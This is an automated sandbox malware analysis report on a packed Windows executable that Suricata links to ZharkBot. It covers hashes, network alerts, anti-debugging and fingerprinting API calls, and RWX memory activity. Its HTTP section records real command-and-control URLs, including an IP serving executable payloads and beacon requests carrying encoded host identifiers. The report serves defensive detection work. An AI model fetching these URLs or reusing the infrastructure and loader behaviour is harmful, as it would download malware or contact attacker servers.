Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Aug. 17, 2024, 10:11 p.m.	Aug. 17, 2024, 10:20 p.m.

Size	326.5KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`f48972736d07992d0cfd2b8bc7972e27`
SHA256	`56d97e9f42ee5b7efdbfcd7d56da50e752fb08599f3422ee0cc9b697a92e56da`
CRC32	`88A0EB7A`
ssdeep	`6144:eyrVs12rjxDPCle3vOYL5q1e0eBEpw2ePRflnm3QBbLVKnzf16Ja2PBipAxWn7jT:eyrVsmjxDPCXfEJaUBipAxKbxLOKP2m`
Yara	Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature IsPE32 - (no description) Generic_Malware_Zero - Generic Malware UPX_Zero - UPX packed file OS_Processor_Check_Zero - OS Processor Check

stub.exe "C:\Users\test22\AppData\Local\Temp\stub.exe"
2552
- FRaqbC8wSA1XvpFVjCRGryWt.exe "C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe"
  2748
- IIZS2TRqf69aZbLAX3cf3edn.exe "C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe"
  2828

Name	Response	Post-Analysis Lookup
garageserviceoperation.com	A 104.21.69.3 A 172.67.202.34	172.67.202.34
solutionhub.cc	A 172.67.128.126 A 104.21.2.10	172.67.128.126

IP Address	Status	Action
164.124.101.2	Active	Moloch
172.67.128.126	Active	Moloch
172.67.202.34	Active	Moloch
185.216.214.225	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49161 -> 172.67.202.34:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
UDP 192.168.56.101:54148 -> 164.124.101.2:53	2054416	ET MALWARE ZharkBot CnC Domain in DNS Lookup (solutionhub .cc)	A Network Trojan was detected
UDP 192.168.56.101:54148 -> 164.124.101.2:53	2027758	ET DNS Query for .cc TLD	Potentially Bad Traffic
TCP 192.168.56.101:49163 -> 172.67.128.126:443	2054418	ET MALWARE Observed ZharkBot Domain (solutionhub .cc in TLS SNI)	A Network Trojan was detected
TCP 192.168.56.101:49163 -> 172.67.128.126:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49164 -> 185.216.214.225:80	2054413	ET MALWARE ZharkBot User-Agent Observed	A Network Trojan was detected
TCP 192.168.56.101:49164 -> 185.216.214.225:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49165 -> 172.67.202.34:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 185.216.214.225:80 -> 192.168.56.101:49164	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.216.214.225:80 -> 192.168.56.101:49164	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 185.216.214.225:80 -> 192.168.56.101:49164	2015745	ET INFO EXE CheckRemoteDebuggerPresent (Used in Malware Anti-Debugging)	Misc activity
TCP 192.168.56.101:49164 -> 185.216.214.225:80	2054413	ET MALWARE ZharkBot User-Agent Observed	A Network Trojan was detected
TCP 192.168.56.101:49164 -> 185.216.214.225:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.216.214.225:80 -> 192.168.56.101:49164	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49161 172.67.202.34:443	C=US, O=Google Trust Services, CN=WE1	CN=garageserviceoperation.com	9f:3e:b4:17:d0:54:94:2b:eb:35:8b:e9:ac:dd:e0:db:91:a5:35:e4
TLSv1 192.168.56.101:49163 172.67.128.126:443	C=US, O=Google Trust Services, CN=WE1	CN=solutionhub.cc	a6:65:a4:77:51:a8:ca:dc:be:0c:0f:5b:5e:b4:fc:d4:cf:fb:24:09
TLSv1 192.168.56.101:49165 172.67.202.34:443	C=US, O=Google Trust Services, CN=WE1	CN=garageserviceoperation.com	9f:3e:b4:17:d0:54:94:2b:eb:35:8b:e9:ac:dd:e0:db:91:a5:35:e4

Queries for the computername (12 events)

Time & API	Arguments	Status	Return
GetComputerNameA Aug. 17, 2024, 10:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 17, 2024, 10:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 17, 2024, 10:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 17, 2024, 10:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 17, 2024, 10:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 17, 2024, 10:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 17, 2024, 10:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 17, 2024, 10:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 17, 2024, 10:12 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 17, 2024, 10:12 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 17, 2024, 10:12 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 17, 2024, 10:12 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (6 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 17, 2024, 10:11 p.m.			0	0
IsDebuggerPresent Aug. 17, 2024, 10:11 p.m.			0	0
IsDebuggerPresent Aug. 17, 2024, 10:12 p.m.			0	0
IsDebuggerPresent Aug. 17, 2024, 10:12 p.m.			0	0
IsDebuggerPresent Aug. 17, 2024, 10:11 p.m.			0	0
IsDebuggerPresent Aug. 17, 2024, 10:11 p.m.			0	0

Uses Windows APIs to generate a cryptographic key (8 events)

Time & API	Arguments	Status	Return
CryptExportKey Aug. 17, 2024, 10:12 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000022ae3f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 17, 2024, 10:12 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000022ae460 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 17, 2024, 10:12 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000022ae460 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 17, 2024, 10:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000746f50 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 8	1	1
CryptExportKey Aug. 17, 2024, 10:11 p.m.	buffer: f é@ÝBÝ¸Räëªªz9!¸QE^âa³ crypto_handle: 0x0000000000746f50 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 8	1	1
CryptExportKey Aug. 17, 2024, 10:12 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000746e70 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 17, 2024, 10:12 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000746e70 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 17, 2024, 10:12 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000746e70 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 17, 2024, 10:11 p.m.		1	1	0

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ Aug. 17, 2024, 10:12 p.m.	stacktrace: 0x7fe94139df3 0x7fe94139c84 0x7fe94139906 0x7fe941391ee 0x7fe94138f5a 0x7fe94138eee 0x7fe93fcf046 CoUninitializeEE+0x4c56f GetMetaDataInternalInterface-0x2b1ad clr+0x4f713 @ 0x7fef363f713 CoUninitializeEE+0x4c09e GetMetaDataInternalInterface-0x2b67e clr+0x4f242 @ 0x7fef363f242 StrongNameTokenFromPublicKey+0x50f2 SetRuntimeInfo-0x3684e clr+0x9b042 @ 0x7fef368b042 StrongNameTokenFromPublicKey+0x4e33 SetRuntimeInfo-0x36b0d clr+0x9ad83 @ 0x7fef368ad83 mscorlib+0x563c95 @ 0x7fef25d3c95 mscorlib+0x4fda7a @ 0x7fef256da7a 0x7fe93fa034c CoUninitializeEE+0x4c56f GetMetaDataInternalInterface-0x2b1ad clr+0x4f713 @ 0x7fef363f713 CoUninitializeEE+0x4c09e GetMetaDataInternalInterface-0x2b67e clr+0x4f242 @ 0x7fef363f242 CoUninitializeEE+0x4c167 GetMetaDataInternalInterface-0x2b5b5 clr+0x4f30b @ 0x7fef363f30b _CorExeMain+0x335c ClrCreateManagedInstance-0x15ae4 clr+0x1e721c @ 0x7fef37d721c _CorExeMain+0x3ab6 ClrCreateManagedInstance-0x1538a clr+0x1e7976 @ 0x7fef37d7976 _CorExeMain+0x39b0 ClrCreateManagedInstance-0x15490 clr+0x1e7870 @ 0x7fef37d7870 _CorExeMain+0x3526 ClrCreateManagedInstance-0x1591a clr+0x1e73e6 @ 0x7fef37d73e6 _CorExeMain+0x347e ClrCreateManagedInstance-0x159c2 clr+0x1e733e @ 0x7fef37d733e _CorExeMain+0x14 ClrCreateManagedInstance-0x18e2c clr+0x1e3ed4 @ 0x7fef37d3ed4 _CorExeMain+0x5d CLRCreateInstance-0x2bd3 mscoreei+0x74e5 @ 0x7fef4e874e5 _CorExeMain+0x69 ND_RU1-0x1707 mscoree+0x5b21 @ 0x7fef4f25b21 BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76c2652d RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x76d5c521 exception.instruction_r: 49 8b 03 48 8b 50 40 49 8b cb ff 12 48 89 45 28 exception.instruction: mov rax, qword ptr [r11] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7fe94139df3 registers.r14: 0 registers.r15: 0 registers.rcx: 0 registers.rsi: 0 registers.r10: 8791524843352 registers.rbx: 0 registers.rsp: 5242400 registers.r11: 0 registers.r8: 0 registers.r9: 8791570546832 registers.rdx: 195 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 0 registers.r13: 0	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

Aug. 17, 2024, 10:12 p.m.

stacktrace:

0x7fe94139df3
0x7fe94139c84
0x7fe94139906
0x7fe941391ee
0x7fe94138f5a
0x7fe94138eee
0x7fe93fcf046
CoUninitializeEE+0x4c56f GetMetaDataInternalInterface-0x2b1ad clr+0x4f713 @ 0x7fef363f713
CoUninitializeEE+0x4c09e GetMetaDataInternalInterface-0x2b67e clr+0x4f242 @ 0x7fef363f242
StrongNameTokenFromPublicKey+0x50f2 SetRuntimeInfo-0x3684e clr+0x9b042 @ 0x7fef368b042
StrongNameTokenFromPublicKey+0x4e33 SetRuntimeInfo-0x36b0d clr+0x9ad83 @ 0x7fef368ad83
mscorlib+0x563c95 @ 0x7fef25d3c95
mscorlib+0x4fda7a @ 0x7fef256da7a
0x7fe93fa034c
CoUninitializeEE+0x4c56f GetMetaDataInternalInterface-0x2b1ad clr+0x4f713 @ 0x7fef363f713
CoUninitializeEE+0x4c09e GetMetaDataInternalInterface-0x2b67e clr+0x4f242 @ 0x7fef363f242
CoUninitializeEE+0x4c167 GetMetaDataInternalInterface-0x2b5b5 clr+0x4f30b @ 0x7fef363f30b
_CorExeMain+0x335c ClrCreateManagedInstance-0x15ae4 clr+0x1e721c @ 0x7fef37d721c
_CorExeMain+0x3ab6 ClrCreateManagedInstance-0x1538a clr+0x1e7976 @ 0x7fef37d7976
_CorExeMain+0x39b0 ClrCreateManagedInstance-0x15490 clr+0x1e7870 @ 0x7fef37d7870
_CorExeMain+0x3526 ClrCreateManagedInstance-0x1591a clr+0x1e73e6 @ 0x7fef37d73e6
_CorExeMain+0x347e ClrCreateManagedInstance-0x159c2 clr+0x1e733e @ 0x7fef37d733e
_CorExeMain+0x14 ClrCreateManagedInstance-0x18e2c clr+0x1e3ed4 @ 0x7fef37d3ed4
_CorExeMain+0x5d CLRCreateInstance-0x2bd3 mscoreei+0x74e5 @ 0x7fef4e874e5
_CorExeMain+0x69 ND_RU1-0x1707 mscoree+0x5b21 @ 0x7fef4f25b21
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76c2652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x76d5c521

exception.instruction_r: 49 8b 03 48 8b 50 40 49 8b cb ff 12 48 89 45 28
exception.instruction: mov rax, qword ptr [r11]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7fe94139df3
registers.r14: 0
registers.r15: 0
registers.rcx: 0
registers.rsi: 0
registers.r10: 8791524843352
registers.rbx: 0
registers.rsp: 5242400
registers.r11: 0
registers.r8: 0
registers.r9: 8791570546832
registers.rdx: 195
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 0
registers.r13: 0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)

suspicious_features	Connection to IP address				suspicious_request	GET http://185.216.214.225/freedom.exe
suspicious_features	Connection to IP address				suspicious_request	GET http://185.216.214.225/Jhiidutz.exe

Performs some HTTP requests (7 events)

request	GET http://185.216.214.225/freedom.exe
request	GET http://185.216.214.225/Jhiidutz.exe
request	GET https://garageserviceoperation.com/socket/?serviceCheckup
request	GET https://solutionhub.cc/socket/?serviceCheckup
request	GET https://garageserviceoperation.com/socket/?id=5BCCD56859158D5509DEF6EE93BD1D99E583188F0C221CF3349EDF15382DB8F4&us=1ACC94780D1E&mn=3AECB4580D1EC6312C&os=39C08968505B9841589FC5AB9AE31E8EF2DC42D055785DDC&bld=2DC8936D5355B11500CDF4E3BCD138B5AFFC62
request	GET https://garageserviceoperation.com/socket/?id=5BCCD56859158D5509DEF6EE93BD1D99E583188F0C221CF3349EDF15382DB8F4&us=1ACC94780D1E&mn=3AECB4580D1EC6312C&os=39C08968505B9841589FC5AB9AE31E8EF2DC42D055785DDC&bld=2DC8936D5355B11500CDF4E3BCD138B5AFFC62&tsk=5F9ADE
request	GET https://garageserviceoperation.com/socket/?id=5BCCD56859158D5509DEF6EE93BD1D99E583188F0C221CF3349EDF15382DB8F4&us=1ACC94780D1E&mn=3AECB4580D1EC6312C&os=39C08968505B9841589FC5AB9AE31E8EF2DC42D055785DDC&bld=2DC8936D5355B11500CDF4E3BCD138B5AFFC62&tsk=5F9ADF

Resolves a suspicious Top Level Domain (TLD) (1 event)

domain

solutionhub.cc

description

Cocos Islands domain TLD

Allocates read-write-execute memory (usually to unpack itself) (50 out of 171 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Aug. 17, 2024, 10:11 p.m.	process_identifier: 2748 region_size: 2228224 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000900000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:11 p.m.	process_identifier: 2748 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000aa0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 17, 2024, 10:11 p.m.	process_identifier: 2748 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef35f1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 17, 2024, 10:11 p.m.	process_identifier: 2748 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3c8b000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:11 p.m.	process_identifier: 2748 region_size: 1900544 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002270000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:11 p.m.	process_identifier: 2748 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000023c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 17, 2024, 10:11 p.m.	process_identifier: 2748 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef35f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 17, 2024, 10:11 p.m.	process_identifier: 2748 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef35f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 17, 2024, 10:11 p.m.	process_identifier: 2748 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef35f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 17, 2024, 10:11 p.m.	process_identifier: 2748 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef35f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 17, 2024, 10:11 p.m.	process_identifier: 2748 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef35f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 17, 2024, 10:11 p.m.	process_identifier: 2748 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef35f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 17, 2024, 10:11 p.m.	process_identifier: 2748 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef35f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 17, 2024, 10:11 p.m.	process_identifier: 2748 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef35f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 17, 2024, 10:11 p.m.	process_identifier: 2748 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef35f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 17, 2024, 10:11 p.m.	process_identifier: 2748 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef35f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 17, 2024, 10:11 p.m.	process_identifier: 2748 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef35f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 17, 2024, 10:11 p.m.	process_identifier: 2748 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef35f4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 17, 2024, 10:11 p.m.	process_identifier: 2748 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef35f4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 17, 2024, 10:11 p.m.	process_identifier: 2748 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef35f4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 17, 2024, 10:11 p.m.	process_identifier: 2748 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef35f4000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:11 p.m.	process_identifier: 2748 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:11 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:11 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:11 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:11 p.m.	process_identifier: 2748 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:11 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:11 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93e6a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:11 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93f1c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:11 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93f46000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:11 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93f20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:11 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93e7c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:11 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93f90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:11 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93e7a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:11 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93e6b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:11 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93e8b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:11 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93f91000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:12 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93e62000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:12 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93ebc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:12 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93e8d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:12 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93fd0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:12 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93f92000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:12 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93e7d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:12 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93f93000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:12 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93f94000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
